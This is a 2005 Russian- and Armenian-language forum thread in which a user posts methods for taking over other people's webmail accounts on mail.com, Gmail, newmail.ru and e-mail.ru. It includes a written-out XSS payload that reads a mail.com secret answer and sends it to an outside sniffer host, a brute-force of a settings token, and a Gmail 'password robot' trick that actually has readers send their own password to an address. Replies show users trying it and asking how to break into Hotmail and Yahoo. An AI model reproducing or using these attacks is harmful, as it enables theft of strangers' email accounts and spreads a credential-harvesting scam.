Levon_78 Posted February 17, 2005 Report Share Posted February 17, 2005 WWW.MAIL.COM Если воспользоваться службой напоминания пароля, то для его получения достаточно ввести правильный ответ на секретный вопрос (один из вариантов). Значит ставим перед собой задачу получить этот ответ. Делается это легко. Когда я зашел в свойства почтового ящика и просматрел регистрационную информацию, то уидел, что ответ на секретный вопрос не скрывается, что и позволяет нам с помощью JavaScript считать его значение. Внедряем скрипт через тэг <style>. <style>@import url(java script:alert());</style> Адрес страницы с настройками: http://mail01.mail.com/scripts/common/genprofile.cgi Имя формы: profileform Имя поля text с секретным ответом: hint_a В итоге, чтобы украсть секретный вопрос, нужно вызвать страницу настроек, запустить JavaScript, получить значение document.profileform.hint_a.value, и передать его на сниффер вместе с переменной среды окружения REQUEST_URI. Готовый вариант: <style>@import url(java script:document.getElementById('out').innerHTML="<%69%66rame src=http://mail01.mail.com/scripts/common/genprofile.cgi name='zero' %6FnLoad=`str=document.zero.profileform.hint_a.value; path='http://zero.h12.ru/stat/capt.php?'; document.zero.location=path+str`></%69%66rame>");</style> <span id='out'></span> В сгенерированном фрейме с именем zero загружается страница настроек. По окончании загрузки, обработчик OnLoad запускает скрипт считывания секретного вопроса, а после, через этот же фрейм отправляет ответ на сниффер. Теперь достаточно зайти по адресу http://zero.h12.ru/stat/log.php, и найти нужную информацию в строке "Host". Quote Link to post Share on other sites
Levon_78 Posted February 17, 2005 Author Report Share Posted February 17, 2005 WWW.GMAIL.COM Взлом почты на Gmail.com. Всё очень просто. По адресу [email protected] сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами. Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ) Итак, мы хотим обломать [email protected] Наш ящик [email protected] пароль 123456 Пишем письмо роботу на [email protected] Subject: login=J.Smith&pass=&answer=;login=hacker&pass=123456&answer= В тело письма ничего вставлять не надо, только в Subject. Т.е. первый раз вставляем в тему письма запрос о ящике-жертве: login=J.Smith&pass=&answer= А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные! login=hacker&pass=123456&answer= Итого: тема сообщения выглядит вот так : login=J.Smith&pass=&answer=;login=hacker&pass=123456&answer= Через несколько секунд пароль с адреса [email protected] будет отправлен на вашу почту. (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы разделяются точкой с запятой. Удачи вам. Quote Link to post Share on other sites
Levon_78 Posted February 17, 2005 Author Report Share Posted February 17, 2005 WWW.NEWMAIL.RU На мой взгляд, довольно популярный почтовик, поэтому расскажу о нём подробно. Тем более, что завладеть чужим аккаунтом на нем намного проще чем кажется с первого взгляда. Можно сделать так: отослать письмо со скриптом, который при запуске получит session id, сформирует нужные запросы, и сменит в настройках значения альтренативного email (на который потом вышлется пароль) и секретного вопроса и ответа. Однако, если при напоминании указать любой другой адрес, пароль вышлется и на него, лишь бы секретный ответ был правильным. И следующее наблюдение: session id для смены настроек можно ВООБЩЕ не использовать. Плюс ко всему, разрешены любые тэги. Все вышеописанное сводит объем кода до пары строк: <iframe src= Quote Link to post Share on other sites
Levon_78 Posted February 17, 2005 Author Report Share Posted February 17, 2005 WWW.E-MAIL.RU Метод взлома e-mail.ru несколько не вписывается в общую тематику статьи, но все же - почта. Когда мне потребовалось получить пароль от одного ящика, я как обычно зарегистрировал себе аккаунт и начал исследовать систему. Первое что бросилось в глаза - возможность установить новый пароль и секретный вопрос с ответом, без ввода старого пароля. План действий обычный: проверить фильтрацию тэгов, получить ID и выполнить запрос. Однако для изменения настроек использовалась специальная переменная utoken, которая содержится в теле документа. Поэкспериментировав со сменой вопроса и ответа с заранее известной utoken: http://www.e-mail.ru/scripts/netauth.dll?c...С&panswer=ОТВЕТ я пришел к выводу, что ID и cookies для смены настроек не требуется. При этом, после наблюдения за utoken, обнаружилось что четырехзначное шестнадцатиричное число после адреса почты [email protected] лежит в весьма узком диапазоне. А именно, чтобы установить секретный вопрос с ответом на любом интересующем нас ящике, нужно перебрать всего 7 вариантов: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. Когда число будет угадано, мы попадем в нужный ящик. Примечания: на данный момент произошли некоторые изменения. Служба восстановления паролей не работает, поэтому целесообразно сразу его изменять. Адрес смены настройки тоже изменился: http://www.e-mail.ru/scripts/netauth.dll?c...С&panswer=ОТВЕТ Способ работает невсегда. Вероятно, все-таки требуется, чтобы пользователь время от времени заходил в почту через web. Quote Link to post Share on other sites
Levon_78 Posted February 17, 2005 Author Report Share Posted February 17, 2005 (edited) На днях добавлю ещё уязвимости почтовика WWW.MAIL.RU Надо сначала проверить его. Всем удачи )) Edited February 17, 2005 by Levon_78 Quote Link to post Share on other sites
Lazar Posted February 18, 2005 Report Share Posted February 18, 2005 Spasibo bol'shoe tebe Levon jan za predostavlennuyu informaciyu. Ya vot poproboval tryuk s gmailom no vot pis'ma s parolem ne poluchil pochemu-to, mozhet chto-to ne to sdelal ? Quote Link to post Share on other sites
Levon_78 Posted February 18, 2005 Author Report Share Posted February 18, 2005 Возможно ты что неправильно сделал, а возможно что уязвимость уже прикрыли, так как в последний раз я проверял её недели 2 назад. Позже просмотрю и сообщу что к чему. Quote Link to post Share on other sites
Lazar Posted February 18, 2005 Report Share Posted February 18, 2005 Լեվոն ջան, տարորինակ նամակ եմ ստացել էտ հասցեից՝ Automatically generated e-mail Answer the following question to reset your password: What was your first phone number? Մեկ էլ reply to-ի տեղը միհատ անծանոթ հասցե է գրած՝[email protected] Էս չլնի՞ էն fakeերն էն որ գաղտաբառներն են հավաքում: Quote Link to post Share on other sites
Levon_78 Posted February 18, 2005 Author Report Share Posted February 18, 2005 Լեվոն ջան, տարորինակ նամակ եմ ստացել էտ հասցեից՝ Automatically generated e-mail Answer the following question to reset your password: What was your first phone number? Մեկ էլ reply to-ի տեղը միհատ անծանոթ հասցե է գրած՝ [email protected] Էս չլնի՞ էն fakeերն էն որ գաղտաբառներն են հավաքում: ← Гы... двое запрашивают один и тот же адресс :lol: Лазар джан вы кого хотите взломать ??? Киньте мне адресс я проверю, если будет время. Quote Link to post Share on other sites
Lazar Posted February 19, 2005 Report Share Posted February 19, 2005 Гы... двое запрашивают один и тот же адресс :lol: Лазар джан вы кого хотите взломать ??? Киньте мне адресс я проверю, если будет время. ← Չէ... ընենց առանձնապես ոչ մեկին չեմ ուզում վզլամատ անել պարզապես ընկերս իր հասցեն տվեց, ասաց որ միհատ փորցեմ տեսնեմ ինչ կստացվի, էն ել դեռևս ոչ մի բան: Quote Link to post Share on other sites
Ani Posted February 19, 2005 Report Share Posted February 19, 2005 հահահա :lol: Երևանում հիմա ով "forgot password(kogda vastanavlivayesh parol')" -ով "" ի գաղտնաբառ է հետ բերում ամբողջ շենքով ու թաղամասով..եթե ոչ հանրապետությամբ ասում է ,որ "hacker"- եմ ապե..... էնպես որ Լազար ջան հանգիստ "վզլամատ" արա.... :lol: mi 2 parol el vor mez hasni datark maili eli gohenq..... :lol: Quote Link to post Share on other sites
Karmir Posted February 19, 2005 Report Share Posted February 19, 2005 Все лёгкие сособы "взлома чужого ящика", где необходимо вводить свой пароль - рассчитаны на лохов. Да уж, "По адресу сидит [email protected] сид mail-робот, который". Эта фишка не то что для ламеров, а для даунов. Как можно так откровенно лажаться! А вот социальная инженерия, поигаться со скиптами или троянами - другое дело. Quote Link to post Share on other sites
arturbobo Posted February 20, 2005 Report Share Posted February 20, 2005 Levon jan kezi mihat harz unem karoxa imanas vonz karank hotmaili kam yahooi maili paswordner@ gtnenk vonzor @ntex verev@ greles gmail... mersiner Quote Link to post Share on other sites
Ani Posted February 22, 2005 Report Share Posted February 22, 2005 (edited) Levon jan kezi mihat harz unem karoxa imanas vonz karank hotmaili kam yahooi maili paswordner@ gtnenk vonzor @ntex verev@ greles gmail... mersiner ← Իմ լսելով... "HOTMAIL" շատ ֆիլտրներ ունի ու բավական դժվար է այդ անելը... ինչպես ,որ Երևանում եթե գումարով "mail" եին "vzlamat" անում...ամենաթանկը "HOTMAIL"-ն էր.... ինչքանով է ճիշտ տեղյակ չեմ...բայց շատ եմ լսել անգամ մոտիկ "hacker"-ներից..!! Edited February 22, 2005 by Ani Quote Link to post Share on other sites
Nelli Posted March 8, 2005 Report Share Posted March 8, 2005 Privet vsem!!!Pomogite mne pojalusta ,moyu pochtu na mail.ru vzlomali i izmenili parol,teper ya ne mogu zayti ,chtobi prochitat pisma adresovannie mne,rasskajite pojalusta esli kto znaet, kak mojno vosstanovit parol u menya nikak ne poluchaetsya zaranee vam blagodarna!!!!!!!!!!! Quote Link to post Share on other sites
Vardan Posted March 9, 2005 Report Share Posted March 9, 2005 А что про Маil.ru??? Quote Link to post Share on other sites
pplLsG Posted April 10, 2009 Report Share Posted April 10, 2009 vsem privet Levon jan mi xntranq cheir asi vonc karam het zlamat anem pochtas v mail.ru?? arden mi amisa et problemn unem mi qani angam dimel em adimnistracia bayc chen ognum anntat sslika en uxarkum vor mtnem u jnjem pochtas bayc et sslikayov mtnum em parola uzum vor@ vor es chgitem. naxoroq shat shnorhakalutyun a tak przy okazi shat urax em vor Administracian @ndunec indz Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.